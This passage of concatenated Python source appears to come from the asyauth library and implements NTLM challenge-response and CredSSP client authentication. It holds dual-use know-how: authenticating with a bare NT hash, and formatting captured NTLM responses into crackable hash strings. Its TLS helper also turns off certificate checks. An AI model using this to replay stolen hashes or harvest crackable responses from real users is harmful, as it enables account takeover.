
from typing import List
from asyauth.common.credentials import UniCredential
from asyauth.common.constants import asyauthSecret, asyauthProtocol, asyauthSubProtocol
from asyauth.common.subprotocols import SubProtocol
from asyauth.common.subprotocols import SubProtocolNative
from asyauth.common.credentials.spnego import SPNEGOCredential

class CREDSSPCredential(UniCredential):
	def __init__(self, credentials:List[UniCredential] = [], subprotocol:SubProtocol = SubProtocolNative()):
		UniCredential.__init__(self, protocol = asyauthProtocol.CREDSSP, subprotocol=subprotocol)
		self.credentials = credentials

	def build_context(self, *args, **kwargs):
		spnego_cred = SPNEGOCredential(self.credentials)
		if self.subprotocol.type == asyauthSubProtocol.NATIVE:
			from asyauth.protocols.credssp.client.native import CredSSPClientNative
			credssp_ctx = CredSSPClientNative(self)
			credssp_ctx.auth_ctx = spnego_cred.build_context()
		else:
			raise Exception('Unsupported subprotocol "%s"' % self.subprotocol)

		return credssp_ctx




from typing import List
from asyauth.common.constants import asyauthSubProtocol
from asyauth.common.subprotocols import SubProtocol
from asysocks.unicomm.common.proxy import UniProxyTarget

class SubProtocolSSPIProxy(SubProtocol):
	def __init__(self, proto:str, host:str, port:int, agentid:str, proxies:List[UniProxyTarget]):
		SubProtocol.__init__(self, asyauthSubProtocol.SSPIPROXY)
		self.proto = proto
		self.host = host
		self.port = port
		self.agentid = agentid
		self.proxies = proxies
	
	def get_url(self):
		return '%s://%s:%s' % (self.proto, self.host, self.port)
	
	@staticmethod
	def from_url_params(query_params = None):
		if 'authagentid' not in query_params:
			if 'agentid' not in query_params:
				raise Exception('SSPIProxy subprotocol requires "agentid" parameter!')
		if 'authhost' not in query_params:
			raise Exception('SSPIProxy subprotocol requires "authhost" parameter!')
		if 'authport' not in query_params:
			raise Exception('SSPIProxy subprotocol requires "authport" parameter!')
		if 'authproto' not in query_params:
			authproto = 'ws'
		else:
			authproto = str(query_params['authproto'][0])

		authhost = str(query_params['authhost'][0])
		authport = str(query_params['authport'][0])
		proxy = UniProxyTarget.from_url_params(query_params, authhost, endpoint_port = authport)

		return SubProtocolSSPIProxy(
			authproto,
			authhost,
			authport,
			str(query_params['authagentid'][0]),
			proxy
		)


import io

class Fields:
	def __init__(self, length, offset, maxLength = None):
		self.length = length
		self.maxLength = length if maxLength is None else maxLength
		self.offset = offset

	@staticmethod
	def from_bytes(bbuff):
		return Fields.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer( buff):
		length    = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		maxLength = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		offset    = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)

		return Fields(length, offset, maxLength = maxLength)

	def to_bytes(self):
		return  self.length.to_bytes(2, byteorder = 'little', signed = False) + \
				self.maxLength.to_bytes(2, byteorder = 'little', signed = False) + \
				self.offset.to_bytes(4, byteorder = 'little', signed = False)


import datetime

from unicrypto.symmetric import DES
from unicrypto import hashlib
from unicrypto import hmac
from ...common.constants import asyauthSecret

from asyauth.protocols.ntlm.structures.challenge_response import *
from asyauth.protocols.ntlm.structures.negotiate_flags import NegotiateFlags
from asyauth.common.credentials.ntlm import NTLMCredential

class Credential:
	def __init__(self, ctype, username=None, domain=None, fullhash = None):
		self.ctype = ctype
		self.domain = domain
		self.username = username
		self.fullhash = fullhash
	
	def to_dict(self):
		return {
			'ctype': self.ctype,
			'username': self.username,
			'domain': self.domain,
			'fullhash': self.fullhash
		}


class NTLMCredentials:
	@staticmethod
	def construct(ntlmNegotiate, ntlmChallenge, ntlmAuthenticate):
		# now the guessing-game begins

		if isinstance(ntlmAuthenticate.NTChallenge, NTLMv2Response):
		#if ntlmAuthenticate._use_NTLMv2:
			# this is a netNTLMv2 then, otherwise auth would have failed on protocol level
			#creds = netntlmv2()
			#creds.username = ntlmAuthenticate.UserName
			#creds.domain   = ntlmAuthenticate.DomainName
			#creds.ServerChallenge = ntlmChallenge.ServerChallenge
			#creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
			#creds.ChallengeFromClinet = ntlmAuthenticate.NTChallenge.ChallengeFromClinet.to_bytes().hex()
			#

			creds = Credential(
				'netNTLMv2',
				username = ntlmAuthenticate.UserName,
				domain = ntlmAuthenticate.DomainName,
				fullhash = '%s::%s:%s:%s:%s' % (
					ntlmAuthenticate.UserName, 
					ntlmAuthenticate.DomainName, 
					ntlmChallenge.ServerChallenge.hex(), 
					ntlmAuthenticate.NTChallenge.Response.hex(), 
					ntlmAuthenticate.NTChallenge.ChallengeFromClinet.to_bytes().hex())
			)
				

			creds2 = netlmv2()
			creds2.username = ntlmAuthenticate.UserName
			creds2.domain   = ntlmAuthenticate.DomainName
			creds2.ServerChallenge = ntlmChallenge.ServerChallenge
			creds2.ClientResponse  = ntlmAuthenticate.LMChallenge.Response
			creds2.ChallengeFromClinet = ntlmAuthenticate.LMChallenge.ChallengeFromClinet
			creds2 = creds2.to_credential()
			return [creds, creds2]

		else:
			if ntlmAuthenticate.NegotiateFlags & NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY:
				# extended security is used, this means that the LMresponse actually contains client challenge data
				# and the LM and NT respondses need to be combined to form the cred data
				creds = netntlm_ess()
				creds.username = ntlmAuthenticate.UserName
				creds.domain   = ntlmAuthenticate.DomainName
				creds.ServerChallenge = ntlmChallenge.ServerChallenge
				creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
				creds.ChallengeFromClinet = ntlmAuthenticate.LMChallenge.Response

				return [creds.to_credential()]

			else:
				creds = netntlm()
				creds.username = ntlmAuthenticate.UserName
				creds.domain   = ntlmAuthenticate.DomainName
				creds.ServerChallenge = ntlmChallenge.ServerChallenge
				creds.ClientResponse  = ntlmAuthenticate.NTChallenge.Response
				
				if ntlmAuthenticate.NTChallenge.Response == ntlmAuthenticate.LMChallenge.Response:
					# the the two responses are the same, then the client did not send encrypted LM hashes, only NT
					return [creds.to_credential()]
					

				# CAME FOR COPPER, FOUND GOLD!!!!!
				# HOW OUTDATED IS YOUR CLIENT ANYHOW???
				creds2 = netlm()
				creds2.username = ntlmAuthenticate.UserName
				creds2.domain   = ntlmAuthenticate.DomainName
				creds2.ServerChallenge = ntlmChallenge.ServerChallenge
				creds2.ClientResponse  = ntlmAuthenticate.LMChallenge.Response
				return [creds2.to_credential(), creds.to_credential()]

class netlm:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the LMv1Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None

	def to_credential(self):
		cred = Credential('netLM',
							username = self.username, 
							fullhash = '%s:$NETLM$%s$%s' % (self.username, self.ServerChallenge, self.ClientResponse)
						)
		return cred

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		Be careful! If the credtype is 'hash' then LM hash is expected!
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			lm_hash = LMOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			lm_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		calc_response = DESL(lm_hash, self.ServerChallenge)

		return self.ClientResponse == calc_response.hex()


class netlmv2:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.username = None
		self.domain = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the LMv2Response class (that is a member of NTLMAuthenticate class)
		self.ClientResponse = None
		self.ChallengeFromClinet = None

	def to_credential(self):
		cred = Credential(
			'netLMv2',
			username = self.username,
			fullhash = '$NETLMv2$%s$%s$%s$%s' % (self.username, self.ServerChallenge, self.ClientResponse, self.ChallengeFromClinet)
		)
		return cred

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			lm_hash = LMOWFv2(creds[self.domain][self.username], self.username, self.domain)
		elif credtype == 'hash':
			lm_hash = LMOWFv2(None, self.username, self.domain, bytes.fromhex(creds[self.domain][self.username]))
		else:
			raise Exception('Unknown cred type!')

		hm = hmac.new(lm_hash, digestmod = 'md5')
		hm.update(bytes.fromhex(self.ServerChallenge))
		hm.update(bytes.fromhex(self.ChallengeFromClinet))

		return self.ClientResponse == hm.hexdigest()


class netntlm_ess:
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.credentials:NTLMCredential = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		self.LMResponse = None
		self.NTResponse = None
		
		self.SessionBaseKey = None
		
	
	# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/d86303b5-b29e-4fb9-b119-77579c761370
	def calc_key_exchange_key(self):
		if self.credentials.stype == asyauthSecret.PASSWORD:
			nt_hash = NTOWFv1(self.credentials.secret)
		elif self.credentials.stype in [asyauthSecret.NT, asyauthSecret.RC4]:
			nt_hash = bytes.fromhex(self.credentials.secret)
		
		hm = hmac.new(self.SessionBaseKey, digestmod = 'md5')
		hm.update(self.ServerChallenge)
		hm.update(self.LMResponse.to_bytes()[:8])
				
		return hm.digest()
		
	@staticmethod
	def construct(server_challenge, client_challenge, credentials:NTLMCredential):
		ntlm_creds = netntlm_ess()
		ntlm_creds.credentials = credentials
		ntlm_creds.ServerChallenge = server_challenge
		
		if credentials.stype == asyauthSecret.PASSWORD:
			nt_hash = NTOWFv1(credentials.secret)
			#lm_hash = LMOWFv1(credentials.secret)
		elif credentials.stype in [asyauthSecret.NT, asyauthSecret.RC4]:
			nt_hash = bytes.fromhex(credentials.nt_hash)
			#lm_hash = bytes.fromhex(credentials.lm_hash) if credentials.lm_hash else None
		
		
		ntlm_creds.LMResponse = LMResponse()
		ntlm_creds.LMResponse.Response = client_challenge + b'\x00' * 16
		
		temp_1 = hashlib.md5(server_challenge + client_challenge[:8]).digest()
		data = DESL(nt_hash, temp_1[:8])
		
		ntlm_creds.NTResponse = NTLMv1Response()
		ntlm_creds.NTResponse.Response = data
		
		ntlm_creds.SessionBaseKey = hashlib.md4(nt_hash).digest()
		
		return ntlm_creds

	def to_credential(self):
		cred = Credential(
			'netNTLMv1-ESS',
			username = self.username,
			fullhash = '%s::%s:%s:%s:%s' % (self.credentials.username, self.credentials.domain, ntlm_creds.LMResponse.Response, ntlm_creds.NTResponse.Response, self.ServerChallenge)
		)
		return cred
		# u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

	def calc_session_base_key(self, creds, credtype = 'plain'):
		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		session_base_key = hashlib.md4(nt_hash).digest()
		return session_base_key

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""
		if creds is None:
			return True
		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		# print('Server chall: %s' % self.ServerChallenge)
		# print('Client chall: %s' % self.ChallengeFromClinet)

		temp_1 = hashlib.md5(bytes.fromhex(self.ServerChallenge) + bytes.fromhex(self.ChallengeFromClinet)[:8]).digest()
		calc_response = DESL(nt_hash, temp_1[:8])
		# print('calc_response: %s' % calc_response.hex())
		# print('ClientResponse: %s' %  self.ClientResponse)

		return calc_response == bytes.fromhex(self.ClientResponse)


class netntlm:
	# not supported by hashcat?
	def __init__(self):
		# this part comes from the NTLMAuthenticate class
		self.credentials = None
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		self.LMResponse = None
		self.NTResponse = None
		
		
		self.SessionBaseKey = None
		
	def calc_key_exchange_key(self, with_lm = False, non_nt_session_key = False):
	
		if self.credentials.password:
			lm_hash = LMOWFv1(self.credentials.password)
		else:
			lm_hash = self.credentials.lm_hash
		
		if with_lm:
			temp1 = DES(lm_hash[:7]).encrypt(self.LMResponse.to_bytes()[:8])
			temp2 = DES(lm_hash[7:8] + b'\xBD\xBD\xBD\xBD\xBD\xBD').encrypt(self.LMResponse.to_bytes()[:8])
			kex = temp1 + temp2

		else:
			if non_nt_session_key:
				kex = lm_hash[:8] + b'\x00' * 8
			else:
				kex = self.SessionBaseKey
				
		return kex
		
	@staticmethod
	def construct(server_challenge, credentials):
		ntlm_creds = netntlm()
		ntlm_creds.credentials = credentials
		ntlm_creds.ServerChallenge = server_challenge
		
		lm_hash = None
		if credentials.stype == asyauthSecret.PASSWORD:
			nt_hash = NTOWFv1(credentials.secret)
			lm_hash = LMOWFv1(credentials.secret)
		elif credentials.stype in [asyauthSecret.NT, asyauthSecret.RC4]:
			nt_hash = bytes.fromhex(credentials.secret)
			#lm_hash = bytes.fromhex(credentials.lm_hash) if credentials.lm_hash else None
		
		ntlm_creds.NTResponse = NTLMv1Response()
		ntlm_creds.NTResponse.Response = DESL(nt_hash, server_challenge)
		
		if lm_hash:
			ntlm_creds.LMResponse = LMResponse()
			ntlm_creds.LMResponse.Response = DESL(lm_hash, server_challenge)
		else:
			ntlm_creds.LMResponse = ntresponse
		
		ntlm_creds.SessionBaseKey = hashlib.md4(nt_hash).digest()
		
		return ntlm_creds

	def to_credential(self):
		cred = Credential('netNTLMv1',
							username = self.username, 
							fullhash = '%s:$NETNTLM$%s$%s' % (self.username, self.ServerChallenge, self.NTResponse.Response)
						)
		return cred
		#username:$NETNTLM$11223333895667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233

	def calc_session_base_key(self, creds, credtype = 'plain'):
		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		session_base_key = hashlib.md4(nt_hash).digest()
		return session_base_key

	def verify(self, creds, credtype='plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform
		:return: bool
		"""
		if creds is None:
			return True
		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv1(creds[self.domain][self.username])
		elif credtype == 'hash':
			nt_hash = bytes.fromhex(creds[self.domain][self.username])
		else:
			raise Exception('Unknown cred type!')

		return DESL(nt_hash, self.ServerChallenge) == bytes.fromhex(self.ClientResponse)


class netntlmv2:
	def __init__(self):
		self.credentials = None
		
		# this comes from the NTLMChallenge class
		self.ServerChallenge = None

		# this is from the NTLMv2Response class (that is a member of NTLMAuthenticate class)
		#self.ClientResponse = None
		#self.ChallengeFromClinet = None
		
		self.LMResponse = None
		self.NTResponse = None
		
		
		self.SessionBaseKey = None
		
	# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/d86303b5-b29e-4fb9-b119-77579c761370
	def calc_key_exchange_key(self):				
		return self.SessionBaseKey
	
	def calc_key_exhange_key_server(self, credentials):
		if not credentials.nt_hash and not credentials.password:
			raise Exception('Password or NT hash must be supplied!')
			
		if credentials.password:
			nt_hash_v2 = NTOWFv2(credentials.password, credentials.username, credentials.domain)
		else:
			nt_hash_v2 = NTOWFv2(None, credentials.username, credentials.domain, bytes.fromhex(credentials.nt_hash))
		
		response = self.NTResponse.Response
		if isinstance(self.NTResponse.Response, str):
			response = bytes.fromhex(self.NTResponse.Response)

		hm = hmac.new(nt_hash_v2, digestmod = 'md5')
		hm.update(response)
		return hm.digest()
		
	@staticmethod
	def construct(server_challenge, client_challenge, server_details, credentials, timestamp = None):
		ntlm_creds = netntlmv2()
		ntlm_creds.credentials = credentials
		ntlm_creds.ServerChallenge = server_challenge
			
		if credentials.stype == asyauthSecret.PASSWORD:
			nt_hash_v2 = NTOWFv2(credentials.secret, credentials.username, credentials.domain)
		elif credentials.stype in [asyauthSecret.NT, asyauthSecret.RC4]:
			nt_hash_v2 = NTOWFv2(None, credentials.username, credentials.domain, bytes.fromhex(credentials.secret))
		else:
			raise Exception('Unsupported secret type "%s"' %  credentials.stype)
		if not timestamp:
			timestamp = datetime.datetime.utcnow()
		
		cc = NTLMv2ClientChallenge.construct(timestamp, client_challenge, server_details)
		temp = cc.to_bytes()
		
		hm = hmac.new(nt_hash_v2, digestmod = 'md5')
		hm.update(server_challenge)
		hm.update(temp)
		
		NTProofStr = hm.digest()
		
		ntlm_creds.NTResponse = NTLMv2Response()
		ntlm_creds.NTResponse.Response = NTProofStr
		ntlm_creds.NTResponse.ChallengeFromClinet = cc
		
			
		hm = hmac.new(nt_hash_v2, digestmod = 'md5')
		hm.update(server_challenge)
		hm.update(client_challenge)
		
		ntlm_creds.LMResponse = LMv2Response()
		ntlm_creds.LMResponse.Response = hm.digest()
		ntlm_creds.LMResponse.ChallengeFromClinet = client_challenge
		
		
		hm = hmac.new(nt_hash_v2, digestmod = 'md5')
		hm.update(NTProofStr)
		ntlm_creds.SessionBaseKey = hm.digest()
		
		return ntlm_creds

	def to_credential(self):
		cred = Credential(
			'netNTLMv2',
			username = self.username,
			domain = self.domain,
			fullhash = '%s::%s:%s:%s:%s' % (self.credentials.username, self.credentials.domain, self.ServerChallenge, self.NTResponse.Response, self.NTResponse.ChallengeFromClinet)
		)
		return cred

	def verify(self, creds, credtype = 'plain'):
		"""
		Verifies the authentication data against the user credentials
		:param creds: dictionary containing the domain, user, hash/password
		:param credtype: can be 'plain' or 'hash' this indicates what type of credential lookup to perform 
		:return: bool
		"""

		# print('Creds: %s' % creds)
		if creds is None:
			return True

		if self.domain not in creds:
			return False
		if self.username not in creds[self.domain]:
			return False

		if credtype == 'plain':
			nt_hash = NTOWFv2(creds[self.domain][self.username], self.username, self.domain)
		elif credtype == 'hash':
			nt_hash = NTOWFv2(None, self.username, self.domain, bytes.fromhex(creds[self.domain][self.username]))
		else:
			raise Exception('Unknown cred type!')

		# print(self.ServerChallenge)
		# print(self.ChallengeFromClinet)

		hm = hmac.new(nt_hash, digestmod = 'md5')
		hm.update(bytes.fromhex(self.ServerChallenge))
		hm.update(bytes.fromhex(self.ChallengeFromClinet))

		# print('M_nthash: %s' % nthash.hex())
		# print('M_temp: %s' % self.ChallengeFromClinet)
		# print('M_nthash: %s' % nthash.hex())
		# print('M_server_chall: %s' % self.ServerChallenge)
		# print('M_ntproof_string: %s' % self.ClientResponse)
		# print('M_ntproof_string_calc: %s' % hm.hexdigest())

		return self.ClientResponse == hm.hexdigest()


def LMOWFv1(password):
	LM_SECRET = b'KGS!@#$%'
	t1 = password[:14].ljust(14, '\x00').upper()
	d = DES(t1[:7].encode('ascii'))
	r1 = d.encrypt(LM_SECRET)
	d = DES(t1[7:].encode('ascii'))
	r2 = d.encrypt(LM_SECRET)

	return r1+r2
	

def NTOWFv1(password):
	if isinstance(password, str) is True:
		password = password.encode('utf-16le')
	return hashlib.md4(password).digest()


def LMOWFv2(Passwd, User, UserDom, PasswdHash = None):
	if UserDom is None:
		UserDom = ''
	return NTOWFv2(Passwd, User, UserDom, PasswdHash)


def NTOWFv2(Passwd, User, UserDom, PasswdHash = None):
	if UserDom is None:
		UserDom = ''
	if PasswdHash is not None:
		fp = hmac.new(PasswdHash, digestmod = 'md5')
	else:
		fp = hmac.new(NTOWFv1(Passwd), digestmod = 'md5')
	fp.update((User.upper() + UserDom).encode('utf-16le'))
	return fp.digest()


def DESL(K, D):
	"""
	Indicates the encryption of an 8-byte data item D with the 16-byte key K
	using the Data Encryption Standard Long (DESL) algorithm.
	The result is 24 bytes in length.
	:param K:
	:param D:
	:return:
	"""
	if len(K) != 16:
		raise Exception("K MUST be 16 bytes long")
	if len(D) != 8:
		raise Exception("D MUST be 8 bytes long")

	res = b''
	res += DES(K[:7]).encrypt(D)
	res += DES(K[7:14]).encrypt(D)
	res += DES(K[14:] + b'\x00'*5).encrypt(D)
	return res




import os
import ssl
from hashlib import sha256

from asn1crypto.x509 import Certificate

from asyauth.common.constants import asyauthSecret
from asyauth.protocols.credssp import logger
from asyauth.protocols.spnego.client.native import SPNEGOClientNative
from asyauth.protocols.credssp.messages.asn1_structs import NegoDatas, \
	NegoData, TSRequest, TSRequest, TSPasswordCreds, TSCredentials, \
	TSRemoteGuardCreds, TSRemoteGuardPackageCred

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cssp/385a7489-d46b-464c-b224-f7340e308a5c

class SSLTunnel:
	#When no certificate is provided, we need to create a SSL tunnel to the server to get the server's public key
	def __init__(self):
		self.ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
		self.ssl_ctx.check_hostname = False
		self.ssl_ctx.verify_mode = ssl.CERT_NONE
		self.ssl_ctx.options |= ssl.OP_NO_COMPRESSION | 0x00000200 | 0x00000800
		self.tls_in_buff = ssl.MemoryBIO()
		self.tls_out_buff = ssl.MemoryBIO()
		self.tls_obj = self.ssl_ctx.wrap_bio(self.tls_in_buff, self.tls_out_buff, server_side=False) # , server_hostname = self.monitor.dst_hostname
		self.handshake_done = False

	def get_peer_certificate(self):
		return self.tls_obj.getpeercert(binary_form=True)

	def data_in(self, data = None):
		if data is not None:
			self.tls_in_buff.write(data)
		
		if self.handshake_done is False:	
			try:
				self.tls_obj.do_handshake()
			except ssl.SSLWantReadError:
				while True:
					client_hello = self.tls_out_buff.read()
					if client_hello != b'':
						#print('DST client_hello %s' % len(client_hello))
						return client_hello
					else:
						break
			except:
				raise
			self.handshake_done = True
		
		buff = b''
		while True:
			try:
				buff += self.tls_obj.read()
			except ssl.SSLWantReadError:
				break
		return buff

	def data_out(self, data:bytes):
		self.tls_obj.write(data)
		
		buff = b''
		while True:
			raw = self.tls_out_buff.read()
			if raw != b'':
				buff += raw
				continue
			break
		return buff


class CredSSPClientNative:
	def __init__(self, credential):
		self.credential = credential
		self.auth_ctx:SPNEGOClientNative = None
		self.cred = None
		self.version = 6
		self.nonce = os.urandom(32)
		self.__internal_auth_continue = True
		self.seqno = 0
		self.__internal_ssl_tunnel = None #CredSSP NEEDS TLS! CredSSP craves TLS!
		self.__pubkey = None

	@staticmethod
	def certificate_to_pubkey(certdata):
		# credSSP auth requires knowledge of the server's public key
		cert = Certificate.load(certdata)
		pubkey = cert['tbs_certificate']['subject_public_key_info']['public_key'].contents
		if pubkey[0] == 0x00:
			# padding causes issues
			logger.debug('CredSSP - removing pubkey padding')
			return pubkey[1:]
		logger.debug('CredSSP - pubkey: %s' % pubkey.hex())
		return pubkey
	
	def get_cipher_name(self):
		if self.__internal_ssl_tunnel is None:
			return None
		ciphers = self.__internal_ssl_tunnel.tls_obj.cipher()
		if ciphers is None or len(ciphers) == 0:
			return None
		return ciphers[0]

	def get_extra_info(self):
		return self.auth_ctx.get_extra_info()

	def get_active_credential(self):
		return self.auth_ctx.get_active_credential()
	
	def get_copy(self):
		return self.credential.build_context()

	def get_internal_seq(self):
		return self.seqno

	def get_active_credential(self):
		self.auth_ctx.get_active_credential()
	
	def is_guest(self):
		return self.auth_ctx.is_guest()
	
	def signing_needed(self):
		return self.auth_ctx.signing_needed()
	
	def encryption_needed(self):
		return self.auth_ctx.encryption_needed()

	def get_seq_number(self):
		return self.auth_ctx.get_seq_number()

	async def verify(self, data, signature):
		raise Exception('CredSSP - verify is not supported by the protocol!')

	async def sign(self, data, message_no, direction='init', reset_cipher = False):
		raise Exception('CredSSP - sign is not supported by the protocol!')
		
	async def encrypt(self, data, message_no, *args, **kwargs):
		if self.__internal_ssl_tunnel is None:
			raise Exception('CredSSP - no SSL tunnel available!')
		return self.__internal_ssl_tunnel.data_out(data), None

	async def decrypt(self, data, message_no, *args, **kwargs):
		if self.__internal_ssl_tunnel is None:
			raise Exception('CredSSP - no SSL tunnel available!')
		return self.__internal_ssl_tunnel.data_in(data), None

	def __return(self, data, to_continue, err):
		if self.__internal_ssl_tunnel is not None:
			return self.__internal_ssl_tunnel.data_out(data), to_continue, err
		return data, to_continue, err
	
	async def authenticate(self, token, flags = None, certificate = None, spn = None, remote_credguard = False, **kwargs):
		try:
			# certificate is optional, as the actual usage of this protocol depends on the upper layer
			# In some cases (like RDP) the certificate is provided by the RDP serrver, but this means that CredSSP will not support encryption/decryption in this level
			# In other cases (like WinRM) the certificate is not provided by the upper layer, and CredSSP will need to create an  SSL tunnel itself. In this case support encryption/decryption in this level

			if self.__pubkey is None:
				if certificate is not None:
					self.__pubkey = CredSSPClientNative.certificate_to_pubkey(certificate)
				elif self.__internal_ssl_tunnel is None:
					logger.debug('CredSSP - creating internal SSL tunnel, as no certificate was provided')
					self.__internal_ssl_tunnel = SSLTunnel()
			
			if self.__internal_ssl_tunnel is not None:
				ssldata = self.__internal_ssl_tunnel.data_in(token)
				if self.__internal_ssl_tunnel.handshake_done is True:
					logger.debug('CredSSP - SSL tunnel handshake done')
					if self.__pubkey is None:
						self.__pubkey = CredSSPClientNative.certificate_to_pubkey(self.__internal_ssl_tunnel.get_peer_certificate())
					token = ssldata
					if ssldata == b'':
						token = None
				else:
					logger.debug('CredSSP - SSL tunnel handshake not done yet')
					return ssldata, True, None
			
			logger.debug('CredSSP - auth continue: %s' % self.__internal_auth_continue)
			logger.debug('CredSSP - token: %s' % token)
			if token is None:
				# initial auth
				returndata, self.__internal_auth_continue, err = await self.auth_ctx.authenticate(token, flags = flags, spn = spn)
				if err is not None:
					raise err
					
				negotoken = {
					'negoToken' : returndata
				}
				retoken = {
					'version' : self.version,
					'negoTokens' : NegoDatas([NegoData(negotoken)])
				}
				result = TSRequest(retoken)
				logger.debug('CredSSP - sending initial auth token: %s' % result.native)
				return self.__return(result.dump(), True, None)
			else:
				if self.__internal_auth_continue is True:
					tdata = TSRequest.load(token)
					logger.debug('CredSSP - got token from server: %s' % tdata.native)
					if tdata.native['version'] < self.version:
						logger.debug('[CREDSSP] Server supports version %s which is smaller than our supported version %s' % (tdata.native['version'], self.version))
						self.version = tdata.native['version']
					if tdata.native['negoTokens'] is None:
						raise Exception('SSPI auth not supported by server')
					sspitoken = tdata.native['negoTokens'][0]['negoToken']
					logger.debug('CredSSP - SSPI token: %s' % sspitoken)
					returndata, self.__internal_auth_continue, err = await self.auth_ctx.authenticate(sspitoken, flags = flags, spn = spn)
					if err is not None:
						raise err
						
					negotoken = {
						'negoToken' : returndata
					}
					retoken = {
						'version' : self.version,
					}
					if returndata is not None:
						retoken['negoTokens'] = NegoDatas([NegoData(negotoken)])
						
					logger.debug('CredSSP - internal auth continue: %s' % self.__internal_auth_continue)
					if self.__internal_auth_continue is False:
						self.seqno = self.auth_ctx.get_internal_seq() #spnego might increate a seq number when signing
						if self.version in [5,6]:
							ClientServerHashMagic = b"CredSSP Client-To-Server Binding Hash\x00"
							ClientServerHash = sha256(ClientServerHashMagic + self.nonce + self.__pubkey).digest()
							logger.debug('CredSSP - ClientServerHash: %s' % ClientServerHash.hex())
							sealedMessage, signature = await self.auth_ctx.encrypt(ClientServerHash, self.seqno)
							self.seqno += 1
							retoken['pubKeyAuth'] = signature+sealedMessage
							retoken['clientNonce'] = self.nonce
							
						elif self.version in [2,3,4]:
							sealedMessage, signature = await self.auth_ctx.encrypt(self.__pubkey, self.seqno)
							self.seqno += 1
							retoken['pubKeyAuth'] = signature+sealedMessage
					
					result = TSRequest(retoken)
					logger.debug('CredSSP - sending internal auth token: %s' % result.native)
					return self.__return(result.dump(), True, None)
				else:
					logger.debug('CredSSP - internal auth finished')
					# sub-level auth protocol finished, now for the other stuff
						
					# waiting for server to reply with the re-encrypted verification string + b'\x01'
					tdata = TSRequest.load(token).native
					if tdata['errorCode'] is not None:
						raise Exception('CredSSP - Server sent an error! Code: %s' % hex(tdata['errorCode'] & (2**32-1)))
					if tdata['pubKeyAuth'] is None:
						raise Exception('Missing pubKeyAuth')
					
					# Verifying server signature
					verification_data, _ = await self.auth_ctx.decrypt(tdata['pubKeyAuth'], 0)
					logger.debug('CredSSP - verification data: %s' % verification_data.hex())
					if self.version in [5,6]:
						ClientServerHashMagic = b"CredSSP Server-To-Client Binding Hash\x00"
						ClientServerHash = sha256(ClientServerHashMagic + self.nonce + self.__pubkey).digest()
						logger.debug('CredSSP - ClientServerHash: %s' % ClientServerHash.hex())
						if verification_data != ClientServerHash:
							raise Exception('CredSSP - Server verification failed!')
					elif self.version in [2,3,4]:
						if verification_data[1:] != self.__pubkey[1:]:
							raise Exception('CredSSP - Server verification failed!')
					
					# Signatures verified, now we can send the final auth token with the password
					# sending credentials
					if remote_credguard is False:
						creds = {
							'domainName' : b'',
							'userName'   : b'',
							'password'   : b'',
						}
						cred = self.auth_ctx.get_active_credential()
						if cred.stype == asyauthSecret.PASSWORD:
							# if domain is not set, it will be set to the current domain
							domain = cred.domain
							if cred.domain is None:
								domain = '.'
							creds = {
								'domainName' : domain.encode('utf-16-le'),
								'userName'   : cred.username.encode('utf-16-le'),
								'password'   : cred.secret.encode('utf-16-le'),
							}
								 
						
						res = TSPasswordCreds(creds)
